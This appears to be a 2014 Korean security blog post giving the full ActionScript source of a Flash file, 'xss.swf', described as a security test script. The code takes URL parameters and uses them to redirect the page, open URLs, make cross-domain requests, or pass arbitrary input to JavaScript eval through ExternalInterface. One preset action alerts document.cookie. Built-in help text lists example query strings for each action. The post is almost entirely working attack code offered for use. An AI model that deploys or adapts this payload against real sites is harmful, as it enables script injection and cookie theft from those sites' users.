Actionscript XSS using Flash
Flash의 Action Script를 이용한 XSS
Source Code
/*
modify by. oneandonlyme.kain@gmail.com
2014/04/29
xss - flash security test script.
ref: fly_flash
*/
import flash.net.*;
import flash.events.SecurityErrorEvent;
var param:Object = root.loaderInfo.parameters;
var action:String = param["a"];
var cmd:String = param["c"];
function attack(action)
{
switch (action)
{
case "l" :// location URL
navigateToURL(new URLRequest(cmd),"_self");
break;
case "o" :// open URL
navigateToURL(new URLRequest(cmd),"_blank");
break;
case "g" :// GET
var loader:URLLoader = new URLLoader(new URLRequest(cmd));
loader.addEventListener(Event.COMPLETE,get_complete);
loader.addEventListener(SecurityErrorEvent.SECURITY_ERROR,get_sec_error);
break;
case "e" :// execute JS
flash.external.ExternalInterface.call("eval", cmd);
break;
case "a" :// execute JS
cmd = 'alert(document.cookie)';
flash.external.ExternalInterface.call("eval", cmd);
break;
case "x" :// execute JS
cmd = 'alert("XSS TEST")';
flash.external.ExternalInterface.call("eval", cmd);
break;
default :
var help:String = 'a(action) - c(cmd)\n';
help += '-----------------\n';
help += '1. location to url: xss.swf?a=l&c=http://www.google.com/\n';
help += '2. open url to new window: xss.swf?a=o&c=http://www.google.com/\n';
help += '3. http request to url: xss.swf?a=g&c=http://www.google.com/\n';
help += '4. eval js codz: xss.swf?a=e&c=alert(document.domain)\n';
help += '5. js code alert(document.cookie): xss.swf?a=a\n';
help += '6. XSS TEST: xss.swf?a=x\n';
help += '-----------------\n';
help += 'by oneandonlyme.kain@gmail.com';
flash.external.ExternalInterface.call("alert", help);
break;
}
stop();
}
function get_complete(event:Event)
{
flash.external.ExternalInterface.call("alert", 'corss domain request ok.');
// __flash__toXML(alert("")) may be error.;
//var d:String = String(event.target.data);
//flash.external.ExternalInterface.call("alert", d);
}
function get_sec_error(event:SecurityErrorEvent)
{
flash.external.ExternalInterface.call("alert", '[security error:]\n/crossdomain.xml\ncross domain request is not allowed.');
}
attack(action);
'30. > 31. Web' 카테고리의 다른 글
Miss-Configuration (0) | 2014.06.21 |
---|---|
Inclusion Attacks (0) | 2014.06.21 |
URL 한글 인코딩, 디코딩 (0) | 2014.04.19 |
OpenSSL HeartBleed 취약점 (0) | 2014.04.19 |
The Hacker Firefox (0) | 2014.04.17 |